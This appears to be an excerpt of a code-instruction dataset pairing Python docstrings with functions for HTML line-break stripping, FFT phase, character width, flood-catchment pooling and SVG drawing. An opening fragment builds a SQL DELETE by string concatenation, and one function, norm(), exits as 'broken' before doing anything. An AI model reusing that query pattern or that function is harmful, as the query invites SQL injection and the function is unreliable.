self.dbcurr.execute("DELETE FROM " + table.lower() +
" WHERE id IN (%s)" % (",".join(bad_ids)))
try:
self.dbconn.commit()
except Exception as e:
self.dbconn.rollback()
# return
return data.drop(['id', 'ix', 'index'], axis=1) |
def strip_br(s):
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
"""
if isinstance(s, basestring):
return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s)
elif isinstance(s, (tuple, list)):
# strip just the last element in a list or tuple
try:
return type(s)(list(s)[:-1] + [strip_br(s[-1])])
except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0
return s
else:
try:
return type(s)(strip_br(str(s)))
except (IndexError, ValueError, AttributeError, TypeError): # s is None
return s | r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',) | Below is the the instruction that describes the task:
### Input:
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
### Response:
def strip_br(s):
r""" Strip the trailing html linebreak character (<BR />) from a string or sequence of strings
A sequence of strings is assumed to be a row in a CSV/TSV file or words from a line of text
so only the last element in a sequence is "stripped"
>>> strip_br(' Title <BR> ')
' Title'
>>> strip_br(list(range(1, 4)))
[1, 2, 3]
>>> strip_br((' Column 1<br />', ' Last Column < br / > '))
(' Column 1<br />', ' Last Column')
>>> strip_br(['name', 'rank', 'serial\nnumber', 'date <BR />'])
['name', 'rank', 'serial\nnumber', 'date']
>>> strip_br(None)
>>> strip_br([])
[]
>>> strip_br(())
()
>>> strip_br(('one element<br>',))
('one element',)
"""
if isinstance(s, basestring):
return re.sub(r'\s*<\s*[Bb][Rr]\s*[/]?\s*>\s*$', '', s)
elif isinstance(s, (tuple, list)):
# strip just the last element in a list or tuple
try:
return type(s)(list(s)[:-1] + [strip_br(s[-1])])
except (IndexError, ValueError, AttributeError, TypeError): # len(s) == 0
return s
else:
try:
return type(s)(strip_br(str(s)))
except (IndexError, ValueError, AttributeError, TypeError): # s is None
return s |
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad) | r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]] | Below is the the instruction that describes the task:
### Input:
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
### Response:
def fftp(wave, npoints=None, indep_min=None, indep_max=None, unwrap=True, rad=True):
r"""
Return the phase of the Fast Fourier Transform of a waveform.
:param wave: Waveform
:type wave: :py:class:`peng.eng.Waveform`
:param npoints: Number of points to use in the transform. If **npoints**
is less than the size of the independent variable vector
the waveform is truncated; if **npoints** is greater than
the size of the independent variable vector, the waveform
is zero-padded
:type npoints: positive integer
:param indep_min: Independent vector start point of computation
:type indep_min: integer or float
:param indep_max: Independent vector stop point of computation
:type indep_max: integer or float
:param unwrap: Flag that indicates whether phase should change phase shifts
to their :code:`2*pi` complement (True) or not (False)
:type unwrap: boolean
:param rad: Flag that indicates whether phase should be returned in radians
(True) or degrees (False)
:type rad: boolean
:rtype: :py:class:`peng.eng.Waveform`
.. [[[cog cog.out(exobj_eng.get_sphinx_autodoc(raised=True)) ]]]
.. Auto-generated exceptions documentation for
.. peng.wave_functions.fftp
:raises:
* RuntimeError (Argument \`indep_max\` is not valid)
* RuntimeError (Argument \`indep_min\` is not valid)
* RuntimeError (Argument \`npoints\` is not valid)
* RuntimeError (Argument \`rad\` is not valid)
* RuntimeError (Argument \`unwrap\` is not valid)
* RuntimeError (Argument \`wave\` is not valid)
* RuntimeError (Incongruent \`indep_min\` and \`indep_max\`
arguments)
* RuntimeError (Non-uniform sampling)
.. [[[end]]]
"""
return phase(fft(wave, npoints, indep_min, indep_max), unwrap=unwrap, rad=rad) |
def norm(table):
"""
fit to normal distribution
"""
print('# norm dist is broken', file=sys.stderr)
exit()
from matplotlib.pyplot import hist as hist
t = []
for i in table:
t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0]))
return t | fit to normal distribution | Below is the the instruction that describes the task:
### Input:
fit to normal distribution
### Response:
def norm(table):
"""
fit to normal distribution
"""
print('# norm dist is broken', file=sys.stderr)
exit()
from matplotlib.pyplot import hist as hist
t = []
for i in table:
t.append(np.ndarray.tolist(hist(i, bins = len(i), normed = True)[0]))
return t |
def char_width(char):
"""
Get the display length of a unicode character.
"""
if ord(char) < 128:
return 1
elif unicodedata.east_asian_width(char) in ('F', 'W'):
return 2
elif unicodedata.category(char) in ('Mn',):
return 0
else:
return 1 | Get the display length of a unicode character. | Below is the the instruction that describes the task:
### Input:
Get the display length of a unicode character.
### Response:
def char_width(char):
"""
Get the display length of a unicode character.
"""
if ord(char) < 128:
return 1
elif unicodedata.east_asian_width(char) in ('F', 'W'):
return 2
elif unicodedata.category(char) in ('Mn',):
return 0
else:
return 1 |
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500,
include_subject_catchment='auto'):
"""
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
"""
if include_subject_catchment not in ['auto', 'force', 'exclude']:
raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) +
"Must be one of `auto`, `force` or `exclude`.")
query = (self.db_session.query(Catchment).
join(Catchment.descriptors).
join(Catchment.amax_records).
filter(Catchment.id != subject_catchment.id,
Catchment.is_suitable_for_pooling,
or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None),
AmaxRecord.flag == 0).
group_by(Catchment).
having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records
catchments = query.all()
# Add subject catchment if required (may not exist in database, so add after querying db
if include_subject_catchment == 'force':
if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments
catchments.append(subject_catchment)
elif include_subject_catchment == 'auto':
if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \
(subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None):
catchments.append(subject_catchment)
# Store the similarity distance as an additional attribute for each catchment
for catchment in catchments:
catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment)
# Then simply sort by this attribute
catchments.sort(key=attrgetter('similarity_dist'))
# Limit catchments until total amax_records counts is at least `records_limit`, default 500
amax_records_count = 0
catchments_limited = []
for catchment in catchments:
catchments_limited.append(catchment)
amax_records_count += catchment.record_length
if amax_records_count >= records_limit:
break
return catchments_limited | Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment` | Below is the the instruction that describes the task:
### Input:
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
### Response:
def most_similar_catchments(self, subject_catchment, similarity_dist_function, records_limit=500,
include_subject_catchment='auto'):
"""
Return a list of catchments sorted by hydrological similarity defined by `similarity_distance_function`
:param subject_catchment: subject catchment to find similar catchments for
:type subject_catchment: :class:`floodestimation.entities.Catchment`
:param similarity_dist_function: a method returning a similarity distance measure with 2 arguments, both
:class:`floodestimation.entities.Catchment` objects
:param include_subject_catchment: - `auto`: include subject catchment if suitable for pooling and if urbext < 0.03
- `force`: always include subject catchment having at least 10 years of data
- `exclude`: do not include the subject catchment
:type include_subject_catchment: str
:return: list of catchments sorted by similarity
:type: list of :class:`floodestimation.entities.Catchment`
"""
if include_subject_catchment not in ['auto', 'force', 'exclude']:
raise ValueError("Parameter `include_subject_catchment={}` invalid.".format(include_subject_catchment) +
"Must be one of `auto`, `force` or `exclude`.")
query = (self.db_session.query(Catchment).
join(Catchment.descriptors).
join(Catchment.amax_records).
filter(Catchment.id != subject_catchment.id,
Catchment.is_suitable_for_pooling,
or_(Descriptors.urbext2000 < 0.03, Descriptors.urbext2000 == None),
AmaxRecord.flag == 0).
group_by(Catchment).
having(func.count(AmaxRecord.catchment_id) >= 10)) # At least 10 AMAX records
catchments = query.all()
# Add subject catchment if required (may not exist in database, so add after querying db
if include_subject_catchment == 'force':
if len(subject_catchment.amax_records) >= 10: # Never include short-record catchments
catchments.append(subject_catchment)
elif include_subject_catchment == 'auto':
if len(subject_catchment.amax_records) >= 10 and subject_catchment.is_suitable_for_pooling and \
(subject_catchment.descriptors.urbext2000 < 0.03 or subject_catchment.descriptors.urbext2000 is None):
catchments.append(subject_catchment)
# Store the similarity distance as an additional attribute for each catchment
for catchment in catchments:
catchment.similarity_dist = similarity_dist_function(subject_catchment, catchment)
# Then simply sort by this attribute
catchments.sort(key=attrgetter('similarity_dist'))
# Limit catchments until total amax_records counts is at least `records_limit`, default 500
amax_records_count = 0
catchments_limited = []
for catchment in catchments:
catchments_limited.append(catchment)
amax_records_count += catchment.record_length
if amax_records_count >= records_limit:
break
return catchments_limited |
def __draw_constant_line(self, value_label_style):
"Draw a constant line on the y-axis with the label"
value, label, style = value_label_style
start = self.transform_output_coordinates((0, value))[1]
stop = self.graph_width
path = etree.SubElement(self.graph, 'path', {
'd': 'M 0 %(start)s h%(stop)s' % locals(),
'class': 'constantLine'})
if style:
path.set('style', style)
text = etree.SubElement(self.graph, 'text', {
'x': str(2),
'y': str(start - 2),
'class': 'constantLine'})
text.text = label | Draw a constant line on the y-axis with the label | Below is the the instruction that describes the task:
### Input:
Draw a constant line on the y-axis with the label
### Response:
def __draw_constant_line(self, value_label_style):
"Draw a constant line on the y-axis with the label"
value, label, style = value_label_style
start = self.transform_output_coordinates((0, value))[1]
stop = self.graph_width
path = etree.SubElement(self.graph, 'path', {
'd': 'M 0 %(start)s h%(stop)s' % locals(),
'class': 'constantLine'})
if style:
path.set('style', style)
text = etree.SubElement(self.graph, 'text', {
'x': str(2),
'y': str(start - 2),
'class': 'constantLine'})
text.text = label |
Subsets and Splits